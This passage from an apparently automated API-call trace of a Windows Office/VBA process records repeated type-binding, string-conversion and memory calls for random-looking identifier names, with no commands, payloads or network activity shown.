ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.078] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x48528ea | out: _Dst=0x34767c) returned 0x0 [0060.078] CRetailMalloc_Free () returned 0x6140301 [0060.078] ITypeComp:RemoteBind (in: This=0x87ce890, szName="soISKC", lHashVal=0x1078a1, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x248 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x248) returned 0x0 [0060.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852912, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="soISKC") returned 7 [0060.078] ITypeComp:RemoteBind (in: This=0x87ce668, szName="soISKC", lHashVal=0x1078a1, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x248 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x248) returned 0x0 [0060.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852912, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="soISKC") returned 7 [0060.079] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="soISKC", lHashVal=0x1078a1, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x248 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x248) returned 0x0 [0060.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852912, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="soISKC") returned 7 [0060.079] ITypeComp:RemoteBind (in: This=0x87cef08, szName="soISKC", lHashVal=0x1078a1, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x248 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x248) returned 0x0 [0060.079] CRetailMalloc_Alloc () returned 0x87fc470 [0060.079] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852912 | out: _Dst=0x87fc470) returned 0x0 [0060.080] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57012f2, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_soISKC") returned 14 [0060.080] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_soISKC", lHashVal=0x10f34a, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.080] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852912 | out: _Dst=0x34767c) returned 0x0 [0060.080] CRetailMalloc_Free () returned 0x6140301 [0060.080] ITypeComp:RemoteBind (in: This=0x87ce890, szName="j2NPZ", lHashVal=0x10ea10, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24c) returned 0x0 [0060.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485295e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="j2NPZ") returned 6 [0060.081] ITypeComp:RemoteBind (in: This=0x87ce668, szName="j2NPZ", lHashVal=0x10ea10, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24c) returned 0x0 [0060.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485295e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="j2NPZ") returned 6 [0060.081] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="j2NPZ", lHashVal=0x10ea10, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24c) returned 0x0 [0060.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485295e, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="j2NPZ") returned 6 [0060.082] ITypeComp:RemoteBind (in: This=0x87cef08, szName="j2NPZ", lHashVal=0x10ea10, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24c) returned 0x0 [0060.082] CRetailMalloc_Alloc () returned 0x87fc470 [0060.082] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x485295e | out: _Dst=0x87fc470) returned 0x0 [0060.082] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570131e, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_j2NPZ") returned 13 [0060.083] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_j2NPZ", lHashVal=0x10adfd, wFlags=0x3, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.083] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x485295e | out: _Dst=0x34767c) returned 0x0 [0060.083] CRetailMalloc_Free () returned 0x6140301 [0060.083] ITypeComp:RemoteBind (in: This=0x87ce890, szName="YMN8tr1U0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24a) returned 0x0 [0060.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852936, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YMN8tr1U0") returned 10 [0060.083] ITypeComp:RemoteBind (in: This=0x87ce668, szName="YMN8tr1U0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24a) returned 0x0 [0060.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852936, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YMN8tr1U0") returned 10 [0060.083] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="YMN8tr1U0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24a) returned 0x0 [0060.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852936, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YMN8tr1U0") returned 10 [0060.084] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YMN8tr1U0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24a) returned 0x0 [0060.084] CRetailMalloc_Alloc () returned 0x87504e0 [0060.084] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x4852936 | out: _Dst=0x87504e0) returned 0x0 [0060.085] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570134a, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_YMN8tr1U0") returned 17 [0060.085] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YMN8tr1U0", lHashVal=0x10601b, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.085] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852936 | out: _Dst=0x34767c) returned 0x0 [0060.085] CRetailMalloc_Free () returned 0xcae0401 [0060.085] ITypeComp:RemoteBind (in: This=0x87ce890, szName="VByA8wuW", lHashVal=0x10f19b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x24e) returned 0x0 [0060.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852982, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="VByA8wuW") returned 9 [0060.085] ITypeComp:RemoteBind (in: This=0x87ce668, szName="VByA8wuW", lHashVal=0x10f19b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x24e) returned 0x0 [0060.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852982, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="VByA8wuW") returned 9 [0060.085] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="VByA8wuW", lHashVal=0x10f19b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x24e) returned 0x0 [0060.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852982, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="VByA8wuW") returned 9 [0060.086] ITypeComp:RemoteBind (in: This=0x87cef08, szName="VByA8wuW", lHashVal=0x10f19b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x24e) returned 0x0 [0060.086] CRetailMalloc_Alloc () returned 0x87fc470 [0060.086] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852982 | out: _Dst=0x87fc470) returned 0x0 [0060.087] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570137a, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_VByA8wuW") returned 16 [0060.087] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_VByA8wuW", lHashVal=0x10c924, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.087] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852982 | out: _Dst=0x34767c) returned 0x0 [0060.087] CRetailMalloc_Free () returned 0x6140301 [0060.087] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xNFgLb", lHashVal=0x10c740, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x250 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x250) returned 0x0 [0060.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529aa, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xNFgLb") returned 7 [0060.087] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xNFgLb", lHashVal=0x10c740, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x250 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x250) returned 0x0 [0060.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529aa, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xNFgLb") returned 7 [0060.088] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xNFgLb", lHashVal=0x10c740, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x250 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x250) returned 0x0 [0060.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529aa, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="xNFgLb") returned 7 [0060.088] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xNFgLb", lHashVal=0x10c740, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x250 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x250) returned 0x0 [0060.088] CRetailMalloc_Alloc () returned 0x87fc470 [0060.088] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x48529aa | out: _Dst=0x87fc470) returned 0x0 [0060.089] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57013a6, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_xNFgLb") returned 14 [0060.090] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xNFgLb", lHashVal=0x1041aa, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.090] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x48529aa | out: _Dst=0x34767c) returned 0x0 [0060.090] CRetailMalloc_Free () returned 0x6140301 [0060.090] ITypeComp:RemoteBind (in: This=0x87ce890, szName="lPn3f0", lHashVal=0x109c5c, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x252 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x252) returned 0x0 [0060.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529ce, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="lPn3f0") returned 7 [0060.090] ITypeComp:RemoteBind (in: This=0x87ce668, szName="lPn3f0", lHashVal=0x109c5c, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x252 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x252) returned 0x0 [0060.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529ce, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="lPn3f0") returned 7 [0060.090] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="lPn3f0", lHashVal=0x109c5c, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x252 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x252) returned 0x0 [0060.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529ce, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="lPn3f0") returned 7 [0060.091] ITypeComp:RemoteBind (in: This=0x87cef08, szName="lPn3f0", lHashVal=0x109c5c, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x252 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x252) returned 0x0 [0060.091] CRetailMalloc_Realloc () returned 0x7426110 [0060.091] CRetailMalloc_Alloc () returned 0x87fc470 [0060.091] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x48529ce | out: _Dst=0x87fc470) returned 0x0 [0060.092] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57013d2, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_lPn3f0") returned 14 [0060.092] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_lPn3f0", lHashVal=0x1016c6, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.092] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x48529ce | out: _Dst=0x34767c) returned 0x0 [0060.092] CRetailMalloc_Free () returned 0x6140301 [0060.092] ITypeComp:RemoteBind (in: This=0x87ce890, szName="gHKcGk", lHashVal=0x10a058, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x254 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x254) returned 0x0 [0060.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529f2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="gHKcGk") returned 7 [0060.092] ITypeComp:RemoteBind (in: This=0x87ce668, szName="gHKcGk", lHashVal=0x10a058, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x254 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x254) returned 0x0 [0060.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529f2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="gHKcGk") returned 7 [0060.092] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="gHKcGk", lHashVal=0x10a058, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x254 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x254) returned 0x0 [0060.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48529f2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="gHKcGk") returned 7 [0060.093] ITypeComp:RemoteBind (in: This=0x87cef08, szName="gHKcGk", lHashVal=0x10a058, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x254 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x254) returned 0x0 [0060.093] CRetailMalloc_Alloc () returned 0x87fc470 [0060.093] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x48529f2 | out: _Dst=0x87fc470) returned 0x0 [0060.094] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57013fe, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_gHKcGk") returned 14 [0060.094] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_gHKcGk", lHashVal=0x101ac2, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.094] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x48529f2 | out: _Dst=0x34767c) returned 0x0 [0060.094] CRetailMalloc_Free () returned 0x6140301 [0060.094] ITypeComp:RemoteBind (in: This=0x87ce890, szName="usM9FP", lHashVal=0x1078c4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x256 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x256) returned 0x0 [0060.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a16, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="usM9FP") returned 7 [0060.094] ITypeComp:RemoteBind (in: This=0x87ce668, szName="usM9FP", lHashVal=0x1078c4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x256 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x256) returned 0x0 [0060.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a16, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="usM9FP") returned 7 [0060.095] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="usM9FP", lHashVal=0x1078c4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x256 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x256) returned 0x0 [0060.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a16, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="usM9FP") returned 7 [0060.095] ITypeComp:RemoteBind (in: This=0x87cef08, szName="usM9FP", lHashVal=0x1078c4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x256 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x256) returned 0x0 [0060.095] CRetailMalloc_Alloc () returned 0x87fc470 [0060.095] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852a16 | out: _Dst=0x87fc470) returned 0x0 [0060.096] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570142a, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_usM9FP") returned 14 